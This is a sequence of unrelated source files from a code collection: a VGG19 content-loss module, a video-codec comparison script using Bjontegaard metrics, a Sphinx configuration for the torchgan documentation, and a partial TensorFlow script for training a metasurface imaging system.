nn.init.constant_(module.weight, 1)
class ContentLoss(nn.Module):
"""Constructs a content loss function based on the VGG19 network.
Using high-level feature mapping layers from the latter layers will focus more on the texture content of the image.
Paper reference list:
-`Photo-Realistic Single Image Super-Resolution Using a Generative Adversarial Network <https://arxiv.org/pdf/1609.04802.pdf>` paper.
-`ESRGAN: Enhanced Super-Resolution Generative Adversarial Networks <https://arxiv.org/pdf/1809.00219.pdf>` paper.
-`Perceptual Extreme Super Resolution Network with Receptive Field Block <https://arxiv.org/pdf/2005.12597.pdf>` paper.
"""
def __init__(self, feature_model_extractor_node: str,
feature_model_normalize_mean: list,
feature_model_normalize_std: list) -> None:
super(ContentLoss, self).__init__()
# Get the name of the specified feature extraction node
self.feature_model_extractor_node = feature_model_extractor_node
# Load the VGG19 model trained on the ImageNet dataset.
model = models.vgg19(True)
# Extract the thirty-sixth layer output in the VGG19 model as the content loss.
self.feature_extractor = create_feature_extractor(model, [feature_model_extractor_node])
# set to validation mode
self.feature_extractor.eval()
# The preprocessing method of the input data. This is the VGG model preprocessing method of the ImageNet dataset.
self.normalize = transforms.Normalize(feature_model_normalize_mean, feature_model_normalize_std)
# Freeze model parameters.
for model_parameters in self.feature_extractor.parameters():
model_parameters.requires_grad = False
def forward(self, sr_tensor: torch.Tensor, hr_tensor: torch.Tensor) -> torch.Tensor:
# Standardized operations
sr_tensor = self.normalize(sr_tensor)
hr_tensor = self.normalize(hr_tensor)
sr_feature = self.feature_extractor(sr_tensor)[self.feature_model_extractor_node]
hr_feature = self.feature_extractor(hr_tensor)[self.feature_model_extractor_node]
# Find the feature map difference between the two images
content_loss = F.mse_loss(sr_feature, hr_feature)
return content_loss
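# Example usage (a sketch; the extractor node "features.35" and the ImageNet
# normalization statistics are common VGG19 choices assumed here for
# illustration, not values fixed by this module):
#
#   content_criterion = ContentLoss("features.35",
#                                   [0.485, 0.456, 0.406],
#                                   [0.229, 0.224, 0.225])
#   loss = content_criterion(sr_tensor, hr_tensor)  # both tensors in [0, 1], shape (N, 3, H, W)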
|
the-stack_0_3831 | #!/usr/bin/python
# Copyright 2014 Google.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Converts video encoding result data from text files to visualization
data source."""
__author__ = "[email protected] (James Zern),"
__author__ += "[email protected] (Jim Bankoski)"
__author__ += "[email protected] (Harald Alvestrand)"
import encoder
import gviz_api
import math
import mpeg_settings
import numpy
import optimizer
import re
import string
import pick_codec
def bdsnr(metric_set1, metric_set2):
"""
BJONTEGAARD Bjontegaard metric calculation
Bjontegaard's metric allows to compute the average gain in psnr between two
rate-distortion curves [1].
rate1,psnr1 - RD points for curve 1
rate2,psnr2 - RD points for curve 2
returns the calculated Bjontegaard metric 'dsnr'
code adapted from code written by : (c) 2010 Giuseppe Valenzise
http://www.mathworks.com/matlabcentral/fileexchange/27798-bjontegaard-metric/content/bjontegaard.m
"""
# pylint: disable=too-many-locals
# numpy seems to do tricks with its exports.
# pylint: disable=no-member
# map() is recommended against.
# pylint: disable=bad-builtin
rate1 = [x[0] for x in metric_set1]
psnr1 = [x[1] for x in metric_set1]
rate2 = [x[0] for x in metric_set2]
psnr2 = [x[1] for x in metric_set2]
log_rate1 = map(math.log, rate1)
log_rate2 = map(math.log, rate2)
# Best cubic poly fit for graph represented by log_ratex, psrn_x.
poly1 = numpy.polyfit(log_rate1, psnr1, 3)
poly2 = numpy.polyfit(log_rate2, psnr2, 3)
# Integration interval.
min_int = max([min(log_rate1), min(log_rate2)])
max_int = min([max(log_rate1), max(log_rate2)])
# Integrate poly1, and poly2.
p_int1 = numpy.polyint(poly1)
p_int2 = numpy.polyint(poly2)
# Calculate the integrated value over the interval we care about.
int1 = numpy.polyval(p_int1, max_int) - numpy.polyval(p_int1, min_int)
int2 = numpy.polyval(p_int2, max_int) - numpy.polyval(p_int2, min_int)
# Calculate the average improvement.
if max_int != min_int:
avg_diff = (int2 - int1) / (max_int - min_int)
else:
avg_diff = 0.0
return avg_diff
def bdrate(metric_set1, metric_set2):
"""
BJONTEGAARD Bjontegaard metric calculation
Bjontegaard's metric allows to compute the average % saving in bitrate
between two rate-distortion curves [1].
rate1,psnr1 - RD points for curve 1
rate2,psnr2 - RD points for curve 2
adapted from code from: (c) 2010 Giuseppe Valenzise
"""
# numpy plays games with its exported functions.
# pylint: disable=no-member
# pylint: disable=too-many-locals
# pylint: disable=bad-builtin
rate1 = [x[0] for x in metric_set1]
psnr1 = [x[1] for x in metric_set1]
rate2 = [x[0] for x in metric_set2]
psnr2 = [x[1] for x in metric_set2]
log_rate1 = map(math.log, rate1)
log_rate2 = map(math.log, rate2)
# Best cubic poly fit for graph represented by log_ratex, psrn_x.
poly1 = numpy.polyfit(psnr1, log_rate1, 3)
poly2 = numpy.polyfit(psnr2, log_rate2, 3)
# Integration interval.
min_int = max([min(psnr1), min(psnr2)])
max_int = min([max(psnr1), max(psnr2)])
# find integral
p_int1 = numpy.polyint(poly1)
p_int2 = numpy.polyint(poly2)
# Calculate the integrated value over the interval we care about.
int1 = numpy.polyval(p_int1, max_int) - numpy.polyval(p_int1, min_int)
int2 = numpy.polyval(p_int2, max_int) - numpy.polyval(p_int2, min_int)
# Calculate the average improvement.
avg_exp_diff = (int2 - int1) / (max_int - min_int)
# In really bad formed data the exponent can grow too large.
# clamp it.
if avg_exp_diff > 200:
avg_exp_diff = 200
# Convert to a percentage.
avg_diff = (math.exp(avg_exp_diff) - 1) * 100
return avg_diff
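# Worked example for the two helpers above (hypothetical RD points, each given
# as a (bitrate, psnr) tuple and already sorted by bitrate):
#
#   curve1 = [(500, 34.0), (1000, 36.5), (2000, 39.0), (4000, 41.0)]
#   curve2 = [(500, 34.8), (1000, 37.2), (2000, 39.6), (4000, 41.5)]
#   bdsnr(curve1, curve2)   # average PSNR difference of curve2 relative to curve1 (dB)
#   bdrate(curve1, curve2)  # average bitrate difference of curve2 relative to curve1 (%)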
def FillForm(string_for_substitution, dictionary_of_vars):
"""
This function substitutes all matches of the command string //%% ... %%//
with the variable represented by ... .
"""
return_string = string_for_substitution
for i in re.findall("//%%(.*)%%//", string_for_substitution):
return_string = re.sub("//%%" + i + "%%//", dictionary_of_vars[i],
return_string)
return return_string
def HasMetrics(line):
"""
The metrics files produced by vpxenc are started with a B for headers.
"""
if line[0:1] != "B" and len(string.split(line)) > 0:
return True
return False
def ParseMetricFile(file_name, metric_column):
"""
Convert a metrics file into a set of numbers.
This returns a sorted list of tuples with the first number
being from the first column (bitrate) and the second being from
metric_column (counting from 0).
"""
metric_set1 = set([])
metric_file = open(file_name, "r")
for line in metric_file:
metrics = string.split(line)
if HasMetrics(line):
if metric_column < len(metrics):
my_tuple = float(metrics[0]), float(metrics[metric_column])
else:
my_tuple = float(metrics[0]), 0
metric_set1.add(my_tuple)
metric_set1_sorted = sorted(metric_set1)
return metric_set1_sorted
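# Illustrative metrics-file layout for ParseMetricFile (hypothetical numbers);
# column 0 is the bitrate, metric_column selects one of the later columns, and
# header lines starting with "B" are skipped by HasMetrics():
#
#   Bitrate PSNR  SSIM
#   500     35.1  0.94
#   1000    37.8  0.96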
def GraphBetter(metric_set1_sorted, metric_set2_sorted, use_set2_as_base):
"""
Search through the sorted metric set for metrics on either side of
the metric from file 1. Since both lists are sorted we really
should not have to search through the entire range, but these
are small lists."""
# pylint: disable=too-many-locals
total_bitrate_difference_ratio = 0.0
count = 0
# TODO(hta): Replace whole thing with a call to numpy.interp()
for bitrate, metric in metric_set1_sorted:
for i in range(len(metric_set2_sorted) - 1):
s2_bitrate_0, s2_metric_0 = metric_set2_sorted[i]
s2_bitrate_1, s2_metric_1 = metric_set2_sorted[i + 1]
# We have a point on either side of our metric range.
if s2_metric_0 < metric <= s2_metric_1:
# Calculate a slope.
if s2_metric_1 - s2_metric_0 != 0:
metric_slope = ((s2_bitrate_1 - s2_bitrate_0) /
(s2_metric_1 - s2_metric_0))
else:
metric_slope = 0
estimated_s2_bitrate = (s2_bitrate_0 + (metric - s2_metric_0) *
metric_slope)
# Calculate percentage difference as given by base.
if use_set2_as_base:
bitrate_difference_ratio = ((bitrate - estimated_s2_bitrate) /
estimated_s2_bitrate)
else:
bitrate_difference_ratio = ((bitrate - estimated_s2_bitrate) /
bitrate)
total_bitrate_difference_ratio += bitrate_difference_ratio
count += 1
break
# Calculate the average improvement between graphs.
if count != 0:
avg = total_bitrate_difference_ratio / count
else:
avg = 0.0
return avg
def DataSetBetter(metric_set1, metric_set2, method):
"""
Compares two data sets and determines which is better and by how
much.
The input metric set is sorted on bitrate.
The first set is the one to compare, the second set is the baseline.
"""
# Be fair to both graphs by testing all the points in each.
if method == 'avg':
avg_improvement = 50 * (
GraphBetter(metric_set1, metric_set2,
use_set2_as_base=True) -
GraphBetter(metric_set2, metric_set1,
use_set2_as_base=False))
elif method == 'dsnr':
avg_improvement = bdsnr(metric_set1, metric_set2)
else:
avg_improvement = bdrate(metric_set2, metric_set1)
return avg_improvement
def FileBetter(file_name_1, file_name_2, metric_column, method):
"""
Compares two data files and determines which is better and by how
much.
metric_column is the metric.
"""
# Store and parse our two files into lists of unique tuples.
# Read the two files, parsing out lines starting with bitrate.
metric_set1_sorted = ParseMetricFile(file_name_1, metric_column)
metric_set2_sorted = ParseMetricFile(file_name_2, metric_column)
return DataSetBetter(metric_set1_sorted, metric_set2_sorted, method)
def HtmlPage(page_template, page_title="", page_subtitle="",
filestable="", snrs="", formatters=""):
"""
Creates a HTML page from the template and variables passed to it.
"""
# pylint: disable=too-many-arguments
# Build up a dictionary of the variables actually used in the template.
my_dict = {
'page_title': page_title,
'page_subtitle': page_subtitle,
'filestable_dpsnr': filestable['dsnr'],
'filestable_avg': filestable['avg'],
'filestable_drate': filestable['drate'],
'snrs': snrs,
'formatters': formatters
}
return FillForm(page_template, my_dict)
def ListOneTarget(codecs, rate, videofile, do_score, datatable,
score_function=None):
"""Extend a datatable with the info about one video file's scores."""
# pylint: disable=too-many-arguments
for codec_name in codecs:
# For testing:
# Allow for direct context injection rather than picking by name.
if isinstance(codec_name, basestring):
codec = pick_codec.PickCodec(codec_name)
my_optimizer = optimizer.Optimizer(codec, score_function=score_function)
else:
my_optimizer = codec_name
codec_name = my_optimizer.context.codec.name
best_encoding = my_optimizer.BestEncoding(rate, videofile)
if do_score and not best_encoding.Result():
best_encoding.Execute()
best_encoding.Store()
AddOneEncoding(codec_name, my_optimizer, best_encoding, videofile,
datatable)
def AddOneEncoding(codec_name, my_optimizer, this_encoding, videofile,
datatable):
assert this_encoding.Result()
# Ignore results that score less than zero.
if my_optimizer.Score(this_encoding) < 0.0:
return
# Datatable is a dictionary of codec name -> result sets.
# Each result set is an array containing result info.
# Each result info is a dictionary containing the
# ID of the configuration used, the
# target bitrate, the command line, the score and the result.
(datatable.setdefault(codec_name, {})
.setdefault(videofile.basename, [])
.append({'config_id': this_encoding.encoder.Hashname(),
'target_bitrate': this_encoding.bitrate,
'encode_command': this_encoding.EncodeCommandLine(),
'score': my_optimizer.Score(this_encoding),
'result': this_encoding.ResultWithoutFrameData()}))
def ListMpegResults(codecs, do_score, datatable, score_function=None):
"""List all scores for all tests in the MPEG test set for a set of codecs."""
# It is necessary to sort on target bitrate in order for graphs to display
# correctly.
for rate, filename in sorted(mpeg_settings.MpegFiles().AllFilesAndRates()):
videofile = encoder.Videofile(filename)
ListOneTarget(codecs, rate, videofile, do_score, datatable,
score_function)
def ListMpegSingleConfigResults(codecs, datatable, score_function=None):
encoder_list = {}
optimizer_list = {}
for codec_name in codecs:
codec = pick_codec.PickCodec(codec_name)
my_optimizer = optimizer.Optimizer(codec,
score_function=score_function, file_set=mpeg_settings.MpegFiles())
optimizer_list[codec_name] = my_optimizer
encoder_list[codec_name] = my_optimizer.BestOverallEncoder()
for rate, filename in sorted(mpeg_settings.MpegFiles().AllFilesAndRates()):
videofile = encoder.Videofile(filename)
for codec_name in codecs:
if encoder_list[codec_name]:
my_encoding = encoder_list[codec_name].Encoding(rate, videofile)
my_encoding.Recover()
AddOneEncoding(codec_name, optimizer_list[codec_name],
my_encoding, videofile, datatable)
def ExtractBitrateAndPsnr(datatable, codec, filename):
dataset = [(r['result']['bitrate'], r['result']['psnr'])
for r in datatable[codec][filename]]
return dataset
def BuildComparisonTable(datatable, metric, baseline_codec, other_codecs):
"""Builds a table of comparison data for this metric."""
# Find the metric files in the baseline codec.
videofile_name_list = datatable[baseline_codec].keys()
countoverall = {}
sumoverall = {}
for this_codec in other_codecs:
countoverall[this_codec] = 0
sumoverall[this_codec] = 0
# Data holds the data for the visualization, name given comes from
# gviz_api sample code.
data = []
for filename in videofile_name_list:
row = {'file': filename}
baseline_dataset = ExtractBitrateAndPsnr(datatable,
baseline_codec,
filename)
# Read the metric file from each of the directories in our list.
for this_codec in other_codecs:
# If there is a metric in this_codec, calculate the overall difference
# between it and the baseline codec's metric.
if (this_codec in datatable and filename in datatable[this_codec]
and filename in datatable[baseline_codec]):
this_dataset = ExtractBitrateAndPsnr(datatable,
this_codec,
filename)
overall = DataSetBetter(
baseline_dataset, this_dataset, metric)
if not math.isnan(overall):
# TODO(hta): figure out when DataSetBetter generates NaN
row[this_codec] = overall
sumoverall[this_codec] += overall
countoverall[this_codec] += 1
data.append(row)
# Add the overall numbers.
row = {"file": "OVERALL " + metric}
for this_codec in other_codecs:
if countoverall[this_codec]:
row[this_codec] = sumoverall[this_codec] / countoverall[this_codec]
data.append(row)
return data
def BuildGvizDataTable(datatable, metric, baseline_codec, other_codecs):
"""Builds a Gviz DataTable giving this metric for the files and codecs."""
description = {"file": ("string", "File")}
data = BuildComparisonTable(datatable, metric, baseline_codec, other_codecs)
for this_codec in other_codecs:
description[this_codec] = ("number", this_codec)
# Generate the gViz table
gviz_data_table = gviz_api.DataTable(description)
gviz_data_table.LoadData(data)
return gviz_data_table
def CrossPerformanceGvizTable(datatable, metric, codecs, criterion):
"""Build a square table of codecs and relative performance."""
# pylint: disable=too-many-locals
videofile_name_list = datatable[codecs[0]].keys()
description = {}
description['codec'] = ('string', 'Codec')
data = []
for codec in codecs:
description[codec] = ('string', codec)
for codec1 in codecs:
lineitem = {'codec': codec1}
for codec2 in codecs:
if codec1 != codec2:
count = 0
overall = 0.0
for filename in videofile_name_list:
if (codec1 in datatable and filename in datatable[codec1]
and codec2 in datatable and filename in datatable[codec2]):
overall += DataSetBetter(
ExtractBitrateAndPsnr(datatable, codec2, filename),
ExtractBitrateAndPsnr(datatable, codec1, filename), metric)
count += 1
if count > 0:
display = ('<a href=/results/show_result.html?' +
'codec1=%s&codec2=%s&criterion=%s>%5.2f</a>') % (
codec2, codec1, criterion, overall / count)
lineitem[codec2] = (overall / count, display)
data.append(lineitem)
gviz_data_table = gviz_api.DataTable(description)
gviz_data_table.LoadData(data)
return gviz_data_table
|
the-stack_0_3832 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# torchgan documentation build configuration file, created by
# sphinx-quickstart on Sat Oct 6 13:31:50 2018.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import time
import sphinx_rtd_theme
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../..")))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Mock Imports
autodoc_mock_imports = ["torch", "pillow", "torchvision", "tensorboardX", "visdom"]
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.doctest",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.ifconfig",
"sphinx.ext.viewcode",
"sphinx.ext.githubpages",
"sphinx.ext.napoleon",
# 'sphinx_gallery.gen_gallery'
]
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = False
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# # Sphinx Gallery configuration
# sphinx_gallery_conf = {
# # path to your examples scripts
# 'examples_dirs': 'tutorial',
# # path where to save gallery generated examples
# 'gallery_dirs': 'tutorials',
# # which examples to execute
# 'filename_pattern': '/tutorial_',
# # intersphinx
# 'reference_url': {
# # The module you locally document uses None
# 'torchgan': None,
# },
# # binder
# 'binder': {
# # Required keys
# 'org': 'torchgan',
# 'repo': 'torchgan',
# 'url': 'https://mybinder.org', # Any URL of a binder server. Must be full URL (e.g. https://mybinder.org).
# 'branch': 'master', # Can be any branch, tag, or commit hash. Use a branch that hosts your docs.
# 'dependencies': 'requirements.txt',
# 'use_jupyter_lab': True # Whether Binder links should start Jupyter Lab instead of the Jupyter Notebook interface.
# },
# 'show_memory': True,
# 'thumbnail_size': (300, 300),
# }
#
# # generate autosummary even if no references
# autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = [".rst", ".md"]
# The master toctree document.
master_doc = "index"
# General information about the project.
project = u"torchgan"
copyright = u"2018-{}, Avik Pal & Aniket Das".format(time.strftime("%Y"))
author = "Avik Pal & Aniket Das"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# The short X.Y version.
version = "v0.0.4"
# The full version, including alpha/beta/rc tags.
release = "v0.0.4"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
"canonical_url": "",
"analytics_id": "",
"logo_only": False,
"display_version": True,
"prev_next_buttons_location": "bottom",
"style_external_links": True,
# Toc options
"collapse_navigation": False,
"sticky_navigation": False,
"navigation_depth": 4,
"includehidden": True,
"titles_only": False,
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
# html_sidebars = {
# '**': ['searchbox.html', 'globaltoc_custom.html'],
# 'using/windows': ['searchbox.html', 'windowssidebar.html'],
# }
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "torchgandoc"
# on_rtd is whether we are on readthedocs.org
on_rtd = os.environ.get("READTHEDOCS", None) == "True"
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
def setup(app):
# app.add_javascript("custom.js")
app.add_stylesheet("theme_overrides.css")
else:
# Override default css to get a larger width for ReadTheDoc build
html_context = {
"css_files": [
"https://media.readthedocs.org/css/sphinx_rtd_theme.css",
"https://media.readthedocs.org/css/readthedocs-doc-embed.css",
"_static/theme_overrides.css",
]
}
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc,
"torchgan.tex",
"torchgan Documentation",
"Avik Pal and Aniket Das",
"manual",
)
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "torchgan", "torchgan Documentation", [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"torchgan",
"torchgan Documentation",
author,
"torchgan",
"One line description of project.",
"Miscellaneous",
)
]
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ["search.html"]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://docs.python.org/3/", None),
"numpy": ("https://docs.scipy.org/doc/numpy/", None),
"pytorch": ("https://pytorch.org/docs/stable", None),
}
|
the-stack_0_3833 | import tensorflow as tf
import numpy as np
from networks.select import select_G
from dataset import train_dataset_sim, test_dataset_sim
from loss import G_loss
from args import parse_args
import metasurface.solver as solver
import metasurface.conv as conv
import scipy.optimize as scp_opt
import os
import time
## Logging for TensorBoard
def log(img, gt_img, Phase_var, G, snr, vgg_model, summary_writer, step, params, args):
# Metasurface simulation
if args.psf_mode == 'SIM_PSF':
solver.set_wavelengths(params, params['lambda_base'])
psfs_debug, psfs_conv_forward = solver.get_psfs(Phase_var * args.bound_val, params, conv_mode=args.conv, aug_rotate=args.aug_rotate)
psfs_conv_deconv = psfs_conv_forward
if args.offset:
            # This allows for spatial sensitivity training
psfs_conv_forward = psfs_conv_forward[1:,:,:,:]
psfs_conv_deconv = psfs_conv_deconv[:-1,:,:,:]
assert(psfs_conv_forward.shape[0] == psfs_conv_deconv.shape[0])
elif args.psf_mode == 'REAL_PSF':
real_psf = np.load(args.real_psf)
real_psf = tf.constant(real_psf, dtype=tf.float32)
real_psf = tf.image.resize_with_crop_or_pad(real_psf, params['psf_width'], params['psf_width'])
real_psf = real_psf / tf.reduce_sum(real_psf, axis=(1,2), keepdims=True)
psfs_debug = real_psf
psfs_conv_forward = real_psf
psfs_conv_deconv = real_psf
else:
assert False, ("Unsupported PSF mode")
conv_image = params['conv_fn'](img, psfs_conv_forward)
sensor_img = solver.sensor_noise(conv_image, params)
_, G_img, G_debug = params['deconv_fn'](sensor_img, psfs_conv_deconv, snr, G, training=False)
# Losses
gt_img = tf.image.resize_with_crop_or_pad(gt_img, params['out_width'], params['out_width'])
G_Content_loss_val, G_loss_components, G_metrics = G_loss(G_img, gt_img, vgg_model, args)
# Save records to TensorBoard
with summary_writer.as_default():
# Images
tf.summary.image(name = 'Input/Input' , data=img, step=step)
tf.summary.image(name = 'Input/GT' , data=gt_img, step=step)
if args.offset:
num_patches = np.size(params['theta_base']) - 1
else:
num_patches = np.size(params['theta_base'])
for i in range(num_patches):
tf.summary.image(name = 'Output/Output_'+str(i), data=G_img[i:i+1,:,:,:], step=step)
tf.summary.image(name = 'Blur/Blur_'+str(i), data=conv_image[i:i+1,:,:,:], step=step)
tf.summary.image(name = 'Sensor/Sensor_'+str(i), data=sensor_img[i:i+1,:,:,:], step=step)
for j, debug in enumerate(G_debug):
tf.summary.image(name = 'Debug/Debug_'+str(j)+'_'+str(i), data=debug[i:i+1,:,:,:] , step=step)
# PSF
for i in range(np.size(params['theta_base'])):
psf_patch = psfs_debug[i:i+1,:,:,:]
tf.summary.image(name='PSF/PSF_'+str(i),
data=psf_patch / tf.reduce_max(psf_patch), step=step)
for l in range(np.size(params['lambda_base'])):
psf_patch = psfs_debug[i:i+1,:,:,l:l+1]
tf.summary.image(name='PSF_'+str(params['lambda_base'][l])+'/PSF_'+str(i),
data=psf_patch / tf.reduce_max(psf_patch), step=step)
for i in range(Phase_var.shape[0]):
tf.summary.scalar(name = 'Phase/Phase_'+str(i), data=Phase_var[i], step=step)
# Metrics
tf.summary.scalar(name = 'metrics/G_PSNR', data = G_metrics['PSNR'], step=step)
tf.summary.scalar(name = 'metrics/G_SSIM', data = G_metrics['SSIM'], step=step)
tf.summary.scalar(name = 'snr', data = snr, step=step)
# Content losses
tf.summary.scalar(name = 'loss/G_Content_loss', data = G_Content_loss_val, step=step)
tf.summary.scalar(name = 'loss/G_Norm_loss' , data = G_loss_components['Norm'], step=step)
tf.summary.scalar(name = 'loss/G_P_loss' , data = G_loss_components['P'], step=step)
tf.summary.scalar(name = 'loss/G_Spatial_loss', data = G_loss_components['Spatial'], step=step)
## Optimization Step
def train_step(mode, img, gt_img, Phase_var, Phase_optimizer, G, G_optimizer, snr, vgg_model, params, args):
with tf.GradientTape() as G_tape:
# Metasurface simulation
if args.psf_mode == 'SIM_PSF':
solver.set_wavelengths(params, params['lambda_base'])
psfs_debug, psfs_conv_forward = solver.get_psfs(Phase_var * args.bound_val, params, conv_mode=args.conv, aug_rotate=args.aug_rotate)
psfs_conv_deconv = psfs_conv_forward
if args.offset:
                # This allows for spatial sensitivity training
psfs_conv_forward = psfs_conv_forward[1:,:,:,:]
psfs_conv_deconv = psfs_conv_deconv[:-1,:,:,:]
assert(psfs_conv_forward.shape[0] == psfs_conv_deconv.shape[0])
elif args.psf_mode == 'REAL_PSF':
real_psf = np.load(args.real_psf)
real_psf = tf.constant(real_psf, dtype=tf.float32)
real_psf = tf.image.resize_with_crop_or_pad(real_psf, params['psf_width'], params['psf_width'])
real_psf = real_psf / tf.reduce_sum(real_psf, axis=(1,2), keepdims=True)
psfs_debug = real_psf
psfs_conv_forward = real_psf
psfs_conv_deconv = real_psf
else:
assert False, ("Unsupported PSF mode")
conv_image = params['conv_fn'](img, psfs_conv_forward)
sensor_img = solver.sensor_noise(conv_image, params)
_, G_img, _ = params['deconv_fn'](sensor_img, psfs_conv_deconv, snr, G, training=True)
# Losses
gt_img = tf.image.resize_with_crop_or_pad(gt_img, params['out_width'], params['out_width'])
G_loss_val, G_loss_components, G_metrics = G_loss(G_img, gt_img, vgg_model, args)
# Apply gradients
if mode == 'Phase':
Phase_gradients = G_tape.gradient(G_loss_val, Phase_var)
Phase_optimizer.apply_gradients([(Phase_gradients, Phase_var)])
Phase_var.assign(tf.clip_by_value(Phase_var, -1.0, 1.0)) # Clipped to normalized phase range
elif mode == 'G':
G_vars = G.trainable_variables
if args.snr_opt:
G_vars.append(snr)
G_gradients = G_tape.gradient(G_loss_val, G_vars)
G_optimizer.apply_gradients(zip(G_gradients, G_vars))
if args.snr_opt:
snr.assign(tf.clip_by_value(snr, 3.0, 4.0))
else:
assert False, "Non-existant training mode"
## Training loop
def train(args):
## Metasurface
params = solver.initialize_params(args)
if args.metasurface == 'random':
phase_initial = np.random.uniform(low = -args.bound_val, high = args.bound_val, size = params['num_coeffs'])
elif args.metasurface == 'zeros':
phase_initial = np.zeros(params['num_coeffs'], dtype=np.float32)
elif args.metasurface == 'single':
phase_initial = np.array([-np.pi * (params['Lx'] * params['pixelsX'] / 2) ** 2 / params['wavelength_nominal'] / params['f'], 0.0, 0.0, 0.0, 0.0], dtype=np.float32)
elif args.metasurface == 'neural':
# Best parameters with neural optimization
phase_initial = np.array([-0.3494864 , -0.00324192, -1. , -1. ,
-1. , -1. , -1. , -1. ], dtype=np.float32)
phase_initial = phase_initial * args.bound_val # <-- should be 1000
assert(args.bound_val == 1000)
else:
if args.metasurface == 'log_asphere':
phase_log = solver.log_asphere_phase(args.s1, args.s2, params)
elif args.metasurface == 'shifted_axicon':
phase_log = solver.shifted_axicon_phase(args.s1, args.s2, params)
elif args.metasurface == 'squbic':
phase_log = solver.squbic_phase(args.A, params)
elif args.metasurface == 'hyperboidal':
phase_log = solver.hyperboidal_phase(args.target_wavelength, params)
elif args.metasurface == 'cubic':
phase_log = solver.cubic_phase(args.alpha, args.target_wavelength, params) # Only for direct inference
else:
assert False, ("Unsupported metasurface mode")
params['general_phase'] = phase_log # For direct phase inference
if args.use_general_phase:
assert(args.Phase_iters == 0)
# For optimization
lb = (params['pixelsX'] - params['pixels_aperture']) // 2
ub = (params['pixelsX'] + params['pixels_aperture']) // 2
x = params['x_mesh'][lb : ub, 0] / (0.5 * params['pixels_aperture'] * params['Lx'])
phase_slice = phase_log[0, lb : ub, params['pixelsX'] // 2]
p_fit, _ = scp_opt.curve_fit(params['phase_func'], x, phase_slice, bounds=(-args.bound_val, args.bound_val))
phase_initial = p_fit
print('Initial Phase: {}'.format(phase_initial), flush=True)
print('Image width: {}'.format(params['image_width']), flush=True)
# Normalize the phases within the bounds
phase_initial = phase_initial / args.bound_val
Phase_var = tf.Variable(phase_initial, dtype = tf.float32)
Phase_optimizer = tf.keras.optimizers.Adam(args.Phase_lr, beta_1=args.Phase_beta1)
# SNR term for deconvolution algorithm
snr = tf.Variable(args.snr_init, dtype=tf.float32)
# Do not optimize phase during finetuning
